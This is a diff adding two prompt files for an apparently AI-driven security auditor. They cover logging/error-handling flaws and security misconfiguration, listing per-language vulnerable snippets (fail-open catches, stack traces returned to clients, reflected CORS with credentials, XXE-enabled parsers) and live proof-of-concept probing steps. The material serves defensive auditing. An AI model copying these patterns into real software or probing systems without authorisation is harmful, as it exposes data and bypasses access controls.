+reaches a SINK that an attacker or unauthorized party reads (an HTTP error
+response shown to the client, a log/telemetry stream a lower-trust party can
+read); (B) MISSING/FAIL-OPEN HANDLING — a catch/rescue or an unhandled
+exceptional condition that swallows or fails OPEN on a security decision, or an
+absent audit record for a security-significant event whose absence is itself the
+weakness. No "add more logging" musings without a security event, no flagging
+ordinary debug logs that carry no secret/PII, no dead code, no posture items
+(no log-retention/SIEM-integration process gaps).
+-->
+
+# Finder — Logging, Error & Exception Handling (`logging-errors`)
+
+**Class key:** `logging-errors` · **OWASP:** A09:2025 (Security Logging &
+Monitoring Failures) / A10:2025 (Mishandling of Exceptional Conditions) ·
+**CWE:** CWE-532 (sensitive info in log) / CWE-209 (sensitive info in error
+message/response) / CWE-755 (improper handling of exceptional conditions) /
+CWE-703 (improper check/handling of exceptional conditions) / CWE-396 (catch of
+overly-broad exception) · **ASVS:** V16 (Security Logging & Error Handling)
+
+## 1. Objective
+
+Find places where (A) a secret, credential, token, or PII reaches a log/telemetry
+sink or a client-facing error response a lower-trust party can read; or (B) a
+security-relevant exceptional condition is mishandled — swallowed, caught too
+broadly, or failed OPEN so a security check is skipped — or a security-
+significant event has no audit record. The bug is information crossing a trust
+boundary via logs/errors, or a control silently not running because an exception
+took a permissive path.
+
+## 2. Where to look
+
+Three surfaces: the **logging layer**, the **error/exception path**, and the
+**security-event audit trail**.
+
+- **Logging layer:** central logger config & formatters, request/response
+  middleware that logs bodies/headers, structured-log field builders, "log the
+  whole object" calls (`log.info(user)`, `log.debug(req)`, `inspect`/`to_json`
+  of a model/params), audit helpers, HTTP client wrappers that log full
+  requests (with `Authorization`/`Cookie`), DB query loggers echoing bound
+  params, exception reporters/Sentry/Bugsnag breadcrumbs, webhook/payment
+  callback handlers logging raw payloads, third-party SDK debug modes.
+- **Error/exception path:** global error handlers / exception middleware,
+  `rescue`/`catch`/`except`/`recover`/`?`-unwrap sites, framework debug pages
+  (Rails `show_exceptions`, Flask `DEBUG=True`, Django `DEBUG=True`, Symfony
+  `APP_DEBUG`, Express default error handler, Spring whitelabel/`server.error.
+  include-stacktrace`), 500-handlers that render `e.message`/`e.backtrace`/
+  `str(e)` to the client, `try/except: pass`, `catch (e) {}`, `rescue => e;
+  nil`, `if err != nil { /* ignored */ }`, `.unwrap()`/`panic` on attacker
+  input.
+- **Security-event audit trail (absence is the bug):** authn (login success/
+  fail, logout), authz denials, password/MFA/email changes, privilege grants,
+  token issuance/revocation, admin actions, payment/refund, data export, account
+  lockout, key rotation — code paths that make these decisions but write NO audit
+  record (and there is a logging facility in the project, so it's an omission,
+  not "no logging exists"). Only flag where the missing record defeats detection
+  of a real attack the codebase is otherwise exposed to.
+
+Route/handler signals to grep: error middleware names (`errorHandler`,
+`ExceptionFilter`, `rescue_from`, `@app.errorhandler`, `Recover`), logger calls
+near auth/payment/token code, `DEBUG`/`development`/`verbose` flags reachable in
+prod config, and security decision points (`authorize`, `verify`, `authenticate`,
+`require_role`, signature/HMAC checks) wrapped in broad try/catch.
+
+Per-language SINK & pattern signals:
+
+- **Crystal:** `Log.info { user.inspect }`, `Log.error(exception: ex) { ... }`
+  logging full params; rendering `ex.message`/`ex.inspect_with_backtrace` to the
+  response; `rescue ex; nil` / bare `rescue` swallowing; Kemal/Lucky error
+  handler echoing `ex.message`; `Log.debug { request.headers.to_s }` (carries
+  `Authorization`).
+- **Ruby:** `Rails.logger.info(params.inspect)` / `logger.debug(user.attributes)`,
+  `logger.info "token=#{token}"`, full `request.headers`/`request.body.read`
+  logged; `rescue => e; render plain: e.message` / `e.backtrace`; `rescue
+  StandardError; nil` / `rescue Exception` swallow; `config.consider_all_requests
+  _local = true` in prod; `config.filter_parameters` NOT covering a sensitive
+  field; Sidekiq/ActiveJob logging args containing secrets.
+- **Node/TS:** `console.log(req.body)` / `logger.info({ headers: req.headers })`
+  / `logger.debug(user)`, `pino`/`winston` without redaction of `password`/
+  `authorization`; `res.status(500).send(err.stack)` / `res.json({ error: err
+  .message })`; Express default error handler in prod (`NODE_ENV` not
+  `production` → stack to client); `catch (e) {}` empty, `.catch(() => {})`
+  swallow, `try {...} catch { return true }` fail-open on an auth check.
+- **Python:** `logging.info("user=%s", user.__dict__)` / `logger.debug(request
+  .headers)` / `print(token)`, logging `request.POST`/`request.json`;
+  `return str(e)` / `traceback.format_exc()` in an HTTP response, Flask/Django
+  `DEBUG=True` reachable in prod; `except Exception: pass`, `except:
+  return True` fail-open, bare `except:` around a `check_permission`.
+- **Go:** `log.Printf("req: %+v", r)` / `log.Println(token)`, logging
+  `r.Header` (Authorization/Cookie); `http.Error(w, err.Error(), 500)` leaking
+  internal errors / `fmt.Fprintf(w, "%v", err)`; `if err != nil { return true }`
+  / `_ = doAuthCheck()` ignored error fail-open; `recover()` that resumes a
+  request after a security panic; verbose `gin`/`echo` error rendering in
+  release mode.
+- **PHP:** `error_log(print_r($_POST, true))` / `Log::info($request->all())`,
+  logging `$request->headers`; `display_errors=On` in prod, `echo $e->getMessage
+  ()` / `var_dump($e)` to output, Laravel `APP_DEBUG=true` (Ignition page leaks
+  env + stack); `try {...} catch (\Exception $e) {}` empty, `@`-suppressed calls
+  hiding failures on a security op.
+- **Java:** `log.info("user={}", user)` / `log.debug(request.getHeader("Authoriza
+  tion"))`, logging full request/`Map` of params; `e.printStackTrace()` to a
+  response, `@ExceptionHandler` returning `e.getMessage()`/stack, Spring
+  `server.error.include-stacktrace=always` / `include-message=always`, whitelabel
+  in prod; `catch (Exception e) {}` empty, `catch (SecurityException e) { return
+  true; }` fail-open, swallowing `InterruptedException`/auth exceptions.
+- **Rust:** `tracing::info!(?req)` / `debug!("token = {}", token)` logging a
+  struct with secrets via `Debug`; returning `format!("{:?}", e)` /
+  `e.to_string()` in an HTTP body; `actix`/`axum` default error response leaking
+  internals; `let _ = verify(...);` ignoring a `Result`, `.unwrap_or(true)` /
+  `if check().is_err() { return Ok(authorized) }` fail-open, `.unwrap()`/`panic!`
+  on attacker-controlled input as an availability/exceptional-condition issue.
+
+## 3. Detection heuristics
+
+This class has two flow shapes. Frame every finding around a concrete SINK and a
+real reader/consequence.
+
+**Shape A — disclosure (CWE-532 / CWE-209).**
+- **SOURCES (sensitive value):** credentials/tokens/secrets — `password`,
+  `passwd`, `secret`, `token`, `authorization`/`Bearer`, session id, API key,
+  `set-cookie`/`cookie`, JWT, private key, OTP/MFA code, reset token, signing
+  key, card PAN/CVV; **and PII** — SSN/national id, full name+DOB, email at scale,
+  phone, address, health/financial records. Also: an *internal detail* that aids
+  attack — SQL text + bound values, file paths, stack traces, internal hostnames/
+  IPs, library versions, raw exception of a downstream system.
+- **SINKS (where it lands + who reads it):**
+  (1) a **log/telemetry stream** a lower-trust party can read — app logs shipped
+  to a broadly-readable store, container stdout, a third-party log/APM/error-
+  reporter, browser `console` in client code, a log file in the web root; or
+  (2) a **client-facing error/response** — an HTTP error body/header rendered to
+  the requester containing `e.message`/`e.backtrace`/stack/SQL/env. Name the
+  concrete reader: "shown in the 500 response to any client", "written to a log
+  forwarded to $third_party", "echoed to browser console of every visitor".
+- Vulnerable patterns: logging a whole request/headers/params/model
+  (`inspect`/`%+v`/`__dict__`/`to_json`/`{...req}`) that *contains* a source;
+  string-building a log line with a token/password var; an error handler that
+  serializes the exception (message/stack/cause-chain) into the client response;
+  debug/verbose mode reachable in prod that turns every 500 into a stack-trace
+  page; SQL/driver errors surfaced verbatim (overlaps `injection` recon — note,
+  don't double-report the injection itself here).
+
+**Shape B — mishandled exceptional condition (CWE-755 / CWE-703 / CWE-396).**
+- **SOURCE:** an operation on a security-relevant path that can throw/error —
+  an authn/authz check, signature/HMAC/JWT verification, decryption, a license/
+  quota/limit check, a payment/fraud check, input parsing of attacker data.
+- **SINK (the mishandling):** a `catch`/`rescue`/`except`/`if err != nil`/
+  `Result` site that (i) **fails OPEN** — on error returns `true`/authorized/the
+  default-allow, skips the check, or proceeds as if it passed; (ii) **swallows
+  silently** a security-significant failure so it neither blocks nor is recorded
+  (`except: pass`, empty `catch`, `rescue; nil`, ignored error return); (iii)
+  **catches too broadly** (`catch (Exception)`/`rescue Exception`/bare `except`)
+  around a security op so a control-flow exception meant to deny is absorbed into
+  the allow path; or (iv) is an **unhandled exceptional condition** on attacker
+  input that an attacker triggers for impact (panic/`.unwrap()` → crash/DoS, or a
+  thrown error that bypasses cleanup/leaves an inconsistent privileged state).
+- Vulnerable patterns to confirm: `try { return verify(t) } catch { return true }`;
+  `rescue => e; user.admin = true` style permissive fallback; signature check
+  whose exception path continues to the protected action; `_ = authorize(...)`
+  return value discarded; `recover()` that swallows then continues serving the
+  request as authenticated; a deny decision that throws and is caught by a
+  generic handler that returns 200.
+
+**Shape B' — missing audit (CWE-778, under A09).** A security-significant event
+(login success/fail, lockout, authz denial, privilege change, password/MFA reset,
+token issue/revoke, admin/data-export/payment action) executes with **no audit
+record**, in a codebase that *does* log elsewhere (so the gap is real, not "no
+logging at all"). Only flag where the absence concretely defeats detection of an
+attack the app is exposed to (e.g. credential stuffing with no failed-login log,
+admin takeover with no actor trail). This is the one shape allowed without a
+"dangerous sink" — the sink is the absent record on an attack-relevant path.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds and is effective on the path:
+
+- **Redaction / filtering applied on the path (Shape A):** the framework's
+  parameter/field filter covers the sensitive key and runs before the sink —
+  Rails `config.filter_parameters` including the field, `pino` `redact:
+  ['req.headers.authorization','*.password']`, `winston` redact format, Python
+  `logging.Filter`/structlog processor that masks, Go zap/zerolog hooks that
+  drop sensitive fields, a `to_log`/`as_json(except:)`/`__repr__` that omits
+  secrets, an explicit `mask()/redact()/[FILTERED]` on the value. Confirm the
+  filter actually covers *this* field/path — a filter list that misses the exact
+  key is NOT effective (name the gap).
+- **Value is not actually sensitive:** a user id (not a token), a public slug,
+  a non-secret config value, a request path/method/status (ordinary access log),
+  a duration/count metric, a correlation id. Logging these is normal — only flag
+  when a real secret/PII/internal-leak source is in the payload.
+- **Sink is not lower-trust-readable (Shape A):** the log goes only to a store no
+  lower-trust party can read AND is not forwarded to a third party, and the value
+  never reaches a client response. If the audit equally can't show a reader, it's
+  defense-in-depth, not a finding. (Container stdout, broadly-shared log
+  platforms, and third-party error reporters DO count as readable — don't dismiss
+  those.)
+- **Generic / safe error response (Shape A):** the client gets a generic message
+  + an opaque correlation/incident id, while the detail is logged server-side
+  only. Custom error pages, `production` mode with stack traces suppressed
+  (`NODE_ENV=production`, `DEBUG=False`, `APP_DEBUG=false`, `include-stacktrace=
+  never`) — verify the prod config actually disables verbose output; a debug flag
+  defaulting on, or driven by an attacker-settable header/param, is NOT safe.
+- **Fail-CLOSED handling (Shape B):** the catch/rescue/error branch DENIES —
+  returns 401/403/false, re-raises, aborts the request, logs and blocks. Catching
+  a *specific* expected exception (e.g. `RecordNotFound -> 404`) and handling it
+  correctly is fine. A broad catch is fine if its body denies/re-raises (it
+  doesn't fail open). Only a permissive/swallowing/ignored path is a finding.
+- **Exception can't reach a security decision / attacker can't trigger it
+  (Shape B):** the `.unwrap()`/`catch` is on a path attacker input never reaches,
+  or the swallowed error is on a non-security operation with no skipped control
+  and no inconsistent privileged state. No reachable trigger or no security
+  consequence → not a finding.
+- **Audit record exists elsewhere on the path (Shape B'):** the event IS logged
+  by a wrapper/middleware/decorator/aspect/DB trigger you missed — trace the full
+  path before claiming absence. A "missing logging" claim with no concrete
+  attack it would have caught is defense-in-depth, not a finding.
+
+If a guard exists but is bypassable — a redaction list missing the exact key, a
+filter applied to one logger but the secret logged via another, prod-mode
+detection keyed off an attacker-controlled header, a "fail-closed" branch that
+only runs for one of several exception types while a sibling type falls through
+to allow — it is NOT a mitigation. Flag it and name the exact bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — a live credential/session/signing-secret or bulk PII written to
+  a sink a remote/lower-trust attacker reads (token in a client-readable log,
+  password in an error returned to the client), enabling account/data takeover;
+  OR a fail-open exception handler on a primary authn/authz/signature check that
+  an unauthenticated attacker triggers to bypass the control entirely.
+- **High** — sensitive value (single user's token/PII, full stack trace + SQL +
+  internal paths) disclosed in a client-facing error or a broadly-readable log
+  enabling targeted follow-on; OR a fail-open/swallowed exception on a security
+  check behind an authn wall; OR `panic`/`.unwrap()` on unauthenticated attacker
+  input giving reliable remote DoS of a critical service.
+- **Medium** — internal info leak with limited attack value (versions, generic
+  internal error text, partial stack) in an error response; a debug/verbose flag
+  that is on but only behind auth or hard to reach; PII to a log of moderate
+  reach; a swallowed exception that degrades a non-primary control; missing audit
+  on a security event where partial signal exists elsewhere.
+- **Low/Info** — minor over-logging with weak sensitivity, theoretical fail-open
+  on an unreachable path, or a missing-audit gap with no concrete attack it would
+  catch — usually downgrade or drop per §4.
+
+For Shape B', severity tracks the *attack the missing record blinds you to*
+(e.g. no failed-login log on a credential-stuffing-exposed endpoint = High), not
+the act of not-logging itself.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "logging-errors-001",
+  "title": "Production error handler returns exception message + stack trace to client",
+  "vuln_class": "logging-errors",
+  "owasp": "A10:2025",
+  "cwe": "CWE-209",
+  "asvs": "V16",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/middleware/error.ts",
+  "line": 14,
+  "end_line": 17,
+  "code_excerpt": "app.use((err, req, res, next) => {\n  res.status(500).json({ error: err.message, stack: err.stack });\n});",
+  "source": "server-side exception object (err.message/err.stack) — for DB errors it embeds the SQL, table/column names, file paths, and library versions",
+  "sink": "HTTP 500 JSON body returned to the requesting client — readable by any unauthenticated caller who triggers an error",
+  "data_flow": "any thrown error -> Express error middleware -> res.json({error: err.message, stack: err.stack}); the full message and stack cross the trust boundary into the response with no generic-message substitution",
+  "sanitizers_checked": "no NODE_ENV gate (stack returned regardless of env); no generic-message + correlation-id pattern; no allowlist of safe error types; verbose path is the default, not opt-in; not suppressed in production config",
+  "rationale": "Reachable by any client that can induce a 500 (malformed input, type errors). Stack + message reveal source paths, dependency versions, and DB schema/SQL, mapping the internals for follow-on attacks. Same leak in src/middleware/api-error.ts:22.",
+  "exploit_sketch": "Send a request that throws (e.g. a body that fails a DB constraint or a type coercion). Read the 500 JSON: harvest the SQL/schema, absolute file paths, and package versions to pivot to injection/known-CVE exploitation.",
+  "dynamic_poc_plan": "Against the running app, POST a malformed payload to an endpoint that hits the DB; observe the 500 response body contains err.stack with file paths and the failing SQL — proving internal detail leaks to the client. A generic message would show none of this.",
+  "proposed_fix": "The error handler must stop returning the raw exception message/stack across the trust boundary and instead surface only a generic, opaque response while the detail stays server-side — so internal details no longer leak to untrusted callers. Direction only; the exact response shape and the prod-mode gating are for the engineer to design."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. For Shape A, `source` is the specific sensitive value (name
+the field — `Authorization` header, `password` param, the token var) and `sink`
+names *where it lands and who reads it* (the exact log stream/third party, or
+"the 500 response to any client"); `data_flow` traces the value into the
+log/response call and notes no redaction/generic-message sits between. For Shape
+B, `source` is the security operation that throws, `sink` is the catch/ignore
+site, and `data_flow` states *why the error path is permissive* (returns
+true/skips the check/swallows) and what control is thereby skipped; for B'
+(missing audit), `sink` is "no audit record on <event>" and `data_flow` names the
+attack whose detection is defeated. `sanitizers_checked` is the §4 FP guard made
+explicit — list each relevant control (redaction filter, prod-mode gate, generic-
+message pattern, fail-closed branch, existing audit elsewhere) and state it is
+absent or, if present, name the exact bypass. Pick `cwe` by shape: 532 sensitive
+data in a **log**, 209 sensitive data in an **error message/response**, 755/703
+mishandled/unchecked exceptional condition (fail-open/swallow/unhandled), 396
+overly-broad catch, 778 missing audit (A09). Use `status:"likely"` for a proven
+static trace, `"confirmed"` only after dynamic repro, `"triage"` when the
+reader/reachability or the security consequence is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a sensitive value actually crosses the boundary, or that the error
+path actually fails open / a security event leaves no trace. Pick the oracle by
+shape:
+
+1. **Error-response disclosure (Shape A, CWE-209).** Induce an error on the live
+   endpoint — malformed body, type mismatch, oversized/empty input, a value that
+   trips a DB constraint. **Observed proof** = the HTTP response (body or headers)
+   contains an exception message, stack trace, SQL text, internal file path,
+   internal hostname/IP, or dependency version that a generic handler would never
+   emit. Capture the exact response. If a debug flag is suspected attacker-
+   settable, send it (`?debug=1`, `X-Debug: true`, `Accept` variations) and show
+   it flips on verbose output.
+2. **Log disclosure (Shape A, CWE-532).** Drive the endpoint with a uniquely
+   marked credential/token (a nonce value in the `Authorization`/`password`/
+   token field), then inspect the log sink the harness can read (container
+   stdout, the configured log file, the test APM/collector). **Observed proof** =
+   the nonce secret appears verbatim (or unredacted) in the log stream — proving
+   the secret is logged. If the real sink isn't reachable, assert the same via a
+   unit test that captures the logger output and shows the field present.
+3. **Fail-open exception (Shape B, CWE-755/703/396).** Force the security
+   operation to throw while sending a request that should be DENIED — feed input
+   that makes the verify/decrypt/authz call raise (malformed token/signature,
+   downstream dependency made to error, a value that triggers the broad catch).
+   **Observed proof** = the request is nonetheless ALLOWED (200 + protected
+   resource / authenticated session / privileged action performed) when a
+   correct fail-closed handler would return 401/403 — demonstrating the
+   exception routed into the allow path. Contrast with a well-formed denied
+   request to show the difference is the thrown-and-swallowed error.
+4. **Unhandled condition / DoS (Shape B, CWE-755).** Send the attacker-controlled
+   input that reaches the `panic`/`.unwrap()`/uncaught throw. **Observed proof** =
+   the worker/process crashes or the request hangs/aborts, and (if applicable)
+   the service stops serving — a reliable single-request DoS. Note whether it's
+   process-wide or request-scoped in `impact`.
+5. **Missing audit (Shape B').** Perform the security-significant action on the
+   live app (e.g. N failed logins, an authz-denied access, a privilege change),
+   then inspect every audit/log sink. **Observed proof** = the action completed
+   but NO record of it exists in any audit stream the defender would consult —
+   proving the event is unobservable. Pair with the concrete attack (credential
+   stuffing / silent privilege escalation) it would have surfaced.
+
+Run the relevant bypass checks when a partial guard exists: a redaction list that
+misses the exact key (send the nonce in the un-redacted field), a prod-mode gate
+driven by a request header (set it), a fail-closed branch that only covers one
+exception type (trigger a sibling type). Record the exact request and observed
+evidence in the `Repro` object (`reproduced`, `method:"live-exploit"`, `poc`,
+`observed`, `impact`). A response carrying the stack/secret, the app accepting a
+denied request after a forced exception, a crash from one request, or a completed
+action with no audit trace each prove the class — set `method:"live-exploit"`.
+If the app can't be run, fall back to a focused unit test that drives the
+sink/handler with the payload and captures the leaked output or the fail-open
+return (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/misconfig.md b/plugins/security/prompts/finders/misconfig.md
new file mode 100644
index 0000000..ad0ca25
--- /dev/null
+++ b/plugins/security/prompts/finders/misconfig.md
@@ -0,0 +1,312 @@
+<!--
+FINDER PROMPT — misconfig. You are a fresh-context auditor hunting ONE class:
+Security Misconfiguration. Read the target's code & config; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a setting that creates a
+REACHABLE exposure of an untrusted-facing surface (or a parser that processes
+attacker input through a dangerous-by-config sink) with no effective guard is a
+finding. No generic hardening checklists, no posture/process items, no dead code.
+-->
+
+# Finder — Security Misconfiguration (misconfig)
+
+**Class key:** `misconfig` · **OWASP:** A02:2025 · **CWE:** CWE-16, CWE-614, CWE-942, CWE-1004, CWE-611 · **ASVS:** V13
+
+## 1. Objective
+
+Find configuration choices that expose the running app to untrusted callers:
+debug/dev mode in production, permissive CORS, missing/insecure security headers
+and cookie flags, exposed admin/actuator/metrics/management endpoints, default
+or shipped credentials, verbose error/stack-trace pages, XXE-enabled XML parsers,
+and world-readable cloud storage. The bug is the *setting*, reachable over the
+network or applied to attacker-controlled input — not a code-flow injection.
+
+## 2. Where to look
+
+Configuration lives in code, framework config files, env defaults, and IaC.
+
+- **Framework/app config:** `config/environments/*.rb`, `settings.py`/
+  `settings/*.py`, `application.{properties,yml}`, `appsettings*.json`, `.env`/
+  `.env.example`, `next.config.js`, `nuxt.config`, `vite.config`, `config.exs`,
+  `wp-config.php`, Crystal `Kemal.config`/`Lucky` env blocks, Go `init()`/flag
+  defaults, Rust `Config`/`figment` builders.
+- **Server/proxy config:** `nginx.conf`, `httpd.conf`/`.htaccess`, `Caddyfile`,
+  `web.config`, `traefik` labels, Express/Koa middleware setup, FastAPI/Starlette
+  middleware, Spring `WebSecurityConfigurerAdapter`/`SecurityFilterChain`.
+- **CORS:** any `Access-Control-Allow-Origin`/`-Credentials` emission; middleware
+  like `cors()` (Express), `flask-cors` `CORS(app)`, `django-cors-headers`,
+  `rack-cors`, Spring `@CrossOrigin`/`CorsConfiguration`, Go `rs/cors`,
+  `gin-contrib/cors`, Crystal `Kemal::Middleware` custom CORS, FastAPI
+  `CORSMiddleware`.
+- **Management/admin surfaces:** Spring Boot Actuator (`management.endpoints.*`,
+  `/actuator/**`), Django Admin (`/admin/`) + `DEBUG`, Flask Debug/Werkzeug
+  console, Rails `/rails/info`, web-console gem, Sidekiq/Resque/Bull dashboards,
+  GraphQL playground/introspection, Swagger/OpenAPI UI, Prometheus `/metrics`,
+  Node `--inspect`, Elasticsearch/Mongo/Redis bound to `0.0.0.0`, pprof
+  (`net/http/pprof` auto-registering on `DefaultServeMux`), Rails Action Cable /
+  `/up` health with internals.
+- **Error handling / debug:** `DEBUG`/`development` flags, `display_errors`,
+  `show_exceptions`, `consider_all_requests_local`, `app.debug`, custom 500
+  pages that render stack traces, ASP.NET `customErrors mode="Off"`.
+- **XML parsers (XXE):** any XML/SOAP/SAML/SVG/DOCX/XLSX/RSS/XML-RPC ingestion of
+  request bodies, uploads, or webhook payloads.
+- **Cloud/IaC:** Terraform/CloudFormation/Pulumi/CDK, k8s manifests, Helm values,
+  `Dockerfile`/`docker-compose.yml`; S3/GCS/Azure bucket ACLs & policies,
+  security groups, public IPs, privileged containers.
+
+Grep signals: `debug`, `DEBUG`, `development`, `allow_origin`, `Allow-Origin`,
+`credentials: true`, `SameSite`, `secure`, `httpOnly`, `actuator`, `metrics`,
+`/admin`, `introspection`, `playground`, `display_errors`, `customErrors`,
+`XMLInputFactory`, `DocumentBuilderFactory`, `setExternalGeneralEntities`,
+`resolve_entities`, `noent`, `0.0.0.0`, `public-read`, `AllUsers`, `*`.
+
+## 3. Detection heuristics
+
+This class has two shapes. (A) **Setting-exposes-surface:** the "source" is the
+untrusted network reaching an endpoint/response governed by the setting; the
+"sink" is the misconfigured directive itself. (B) **Parser/XXE:** classic
+SOURCE (attacker XML) → SINK (entity-resolving parse).
+
+**Taint SOURCES** (untrusted): any unauthenticated/cross-origin HTTP request that
+reaches the exposed surface; the cross-origin page's `Origin` header (CORS);
+attacker-supplied XML/SVG/document bytes for XXE; an internet-routable bucket URL
+for cloud exposure.
+
+**Taint SINKS** (dangerous setting/op): the directive that grants exposure —
+`Access-Control-Allow-Origin: *` with credentials, `DEBUG=True`, an unauthed
+actuator route, an entity-resolving parser, a `public-read` ACL.
+
+Vulnerable patterns to confirm:
+
+- **Debug/dev mode reachable in prod:**
+  - Python/Django `DEBUG = True` (Werkzeug/Django traceback page → SECRET_KEY,
+    env, source); Flask `app.run(debug=True)` or `app.debug=True` (interactive
+    `/console` PIN-protected but PIN derivable → RCE).
+  - Rails `config.consider_all_requests_local = true` or
+    `config.web_console.whitelisted_ips` permissive in a prod env file.
+  - Node `NODE_ENV !== 'production'` gating stack traces, Express default error
+    handler leaking `err.stack`; `app.set('env','development')`.
+  - PHP `display_errors = On` / `ini_set('display_errors',1)`;
+    `error_reporting(E_ALL)` with output.
+  - Symfony `APP_ENV=dev` web profiler/`_profiler` exposed; ASP.NET
+    `<customErrors mode="Off">` / `app.UseDeveloperExceptionPage()` unconditional.
+  - Go: serving with verbose error echo `fmt.Fprintf(w, "%+v", err)`.
+- **Permissive CORS:**
+  - Reflecting Origin **and** allowing credentials:
+    `Access-Control-Allow-Origin: <reflected Origin>` + `Allow-Credentials:
+    true` (defeats same-origin; any site reads authed responses). Express:
+    `cors({origin: true, credentials: true})` or `origin: (o,cb)=>cb(null,true)`.
+    Flask: `CORS(app, supports_credentials=True)` with default `*`/reflect.
+    Spring: `config.setAllowedOrigins(List.of("*"))` +
+    `setAllowCredentials(true)` (or `@CrossOrigin(origins="*",
+    allowCredentials="true")`). Go `rs/cors`: `AllowedOrigins:["*"],
+    AllowCredentials:true`.
+  - `ACAO: *` on an endpoint serving sensitive data (even without credentials).
+  - Naive origin allowlist by substring/suffix: `origin.endsWith("trusted.com")`
+    (→ `trusted.com.evil.com`) or `origin.includes(...)`.
+  - `null` origin allowed (reachable via sandboxed iframe / data: URI).
+- **Missing/insecure security headers & cookie flags:** session/auth cookies set
+  without `Secure` + `HttpOnly` + `SameSite` (CWE-614/1004/1004): Express
+  `res.cookie('sid', v)` (no opts), Rails `session_store` without `secure:true`,
+  Django `SESSION_COOKIE_SECURE=False`/`SESSION_COOKIE_HTTPONLY=False`, PHP
+  `session.cookie_secure=0`. Missing `Strict-Transport-Security`,
+  `X-Frame-Options`/`frame-ancestors` on auth/state-changing pages. (Only flag
+  with a concrete impact path — see §4/§5.)
+- **Exposed management/admin/metrics:** Spring Boot
+  `management.endpoints.web.exposure.include=*` with security disabled →
+  `/actuator/env`, `/heapdump`, `/jolokia` (RCE), `/shutdown`. Go
+  `import _ "net/http/pprof"` on a public `DefaultServeMux`. GraphQL
+  `introspection: true` + playground in prod. Swagger UI mounted unauthenticated
+  on a private API. Datastore bound `0.0.0.0` with no auth in compose/k8s.
+  Sidekiq/Bull/Flower dashboards mounted without an auth constraint.
+- **Default / shipped credentials:** admin bootstrap with a literal default
+  (`admin`/`admin`, `password`, `changeme`), env defaults like
+  `POSTGRES_PASSWORD=postgres`, `JWT_SECRET=secret`/`devsecret` used when env
+  unset, demo API keys, framework sample secrets (`SECRET_KEY_BASE` checked-in,
+  Django `SECRET_KEY='django-insecure-...'`). Pattern: `ENV["X"] || "literal"`
+  where the literal is a credential and prod can hit the fallback. (Hardcoded
+  *secrets* discovery is the `secrets` finder; here flag the **default-credential
+  configuration / weak fallback** that grants access.)
+- **Verbose error pages:** custom exception handler that serializes
+  `exception.message`/`stack`/SQL into the HTTP response for any caller.
+- **XXE-enabled parsers** (SOURCE→SINK, the one true taint flow here):
+  - Java: `DocumentBuilderFactory.newInstance()` / `SAXParserFactory` /
+    `XMLInputFactory` / `TransformerFactory` / `SAXReader` / `Unmarshaller`
+    **without** `disallow-doctype-decl` / `external-general-entities=false`.
+    `dbf.parse(request.getInputStream())`.
+  - Python: `lxml.etree.parse(data, etree.XMLParser(resolve_entities=True))` or
+    default `resolve_entities` in old lxml; `xml.dom.minidom`/`xml.sax`/
+    `pulldom`/`xmlrpc` on Python without `defusedxml`.
+  - PHP: `libxml_disable_entity_loader(false)` + `DOMDocument->loadXML($body)` /
+    `simplexml_load_string` / `XMLReader` with `LIBXML_NOENT`.
+  - .NET: `XmlReaderSettings.DtdProcessing = DtdProcessing.Parse` +
+    `XmlResolver` set; legacy `XmlDocument.LoadXml(userXml)` (DTD on by default
+    pre-4.5.2).
+  - Ruby: `Nokogiri::XML(body){|c| c.noent}` (the `NOENT` option enables entity
+    substitution); `REXML` (entity-expansion/billion-laughs).
+  - Node: `libxmljs.parseXml(body, {noent:true})`; some `xml2js`/`fast-xml-parser`
+    configs. (Many JS XML parsers don't resolve external entities by default —
+    verify.)
+  - Go/Crystal/Rust: stdlib `encoding/xml`, Crystal `XML.parse`, Rust
+    `quick-xml`/`roxmltree` generally do NOT resolve external entities — usually
+    NOT XXE; confirm before flagging.
+- **World-readable cloud storage / IaC exposure:**
+  - Terraform `aws_s3_bucket_acl { acl = "public-read" }` /
+    `aws_s3_bucket_public_access_block` with all `false` / bucket policy
+    `Principal:"*"` + `s3:GetObject`; GCS `iam_member` granting `allUsers`
+    `objectViewer`; Azure container `public_access = "blob"/"container"`.
+  - Security group `cidr_blocks = ["0.0.0.0/0"]` to 22/3306/6379/admin ports.
+  - k8s/compose: `privileged: true`, `hostNetwork`, ports published to host,
+    `runAsRoot`, secrets mounted readable.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **Setting is environment-gated to non-prod and prod cannot reach it.** `DEBUG`,
+  dev error pages, playground/introspection, profilers behind a real
+  environment check (`if Rails.env.development?`, `if (process.env.NODE_ENV !==
+  'production')`, Django `DEBUG = env.bool("DEBUG", False)` defaulting False,
+  Spring profile `@Profile("dev")`). Verify the **default/prod** value, not the
+  dev one. A `DEBUG=True` only in `settings/dev.py` that prod never imports is
+  not a finding.
+- **CORS is safe:** exact-origin allowlist (parsed, full-origin equality), or
+  `*` **without** `Allow-Credentials` on **non-sensitive/public** data, or
+  credentials disabled. Note: browsers reject `ACAO:*` + credentials, so that
+  exact combo is inert — only **reflected/dynamic** origin + credentials is the
+  real bug. A reflected origin checked against a strict allowlist is fine.
+- **Management/admin surface is authenticated/network-isolated in code or
+  verifiable config:** actuator behind `SecurityFilterChain` requiring a role;
+  dashboard mounted inside an `authenticate`/`before_action` auth block; metrics
+  bound to `127.0.0.1`/management port not the public listener; endpoint gated by
+  an IP allowlist or service mesh you can see in the repo. Don't assume a
+  perimeter you can't see, but do credit one that's in-repo.
+- **Cookies:** `Secure`/`HttpOnly`/`SameSite` set (directly or via framework
+  secure defaults — Rails 7 secure cookie defaults, Django
+  `SESSION_COOKIE_SECURE=True`, `cookie-session`/`express-session` with proper
+  opts). `HttpOnly` absence is only a finding if there's a real XSS-assisted
+  theft path or the cookie is a session/auth token; missing `Secure` only matters
+  if served over HTTP/mixed. Missing `X-Frame-Options` is only a finding on
+  state-changing/auth UI with a clickjacking impact — otherwise it's
+  defense-in-depth, skip it.
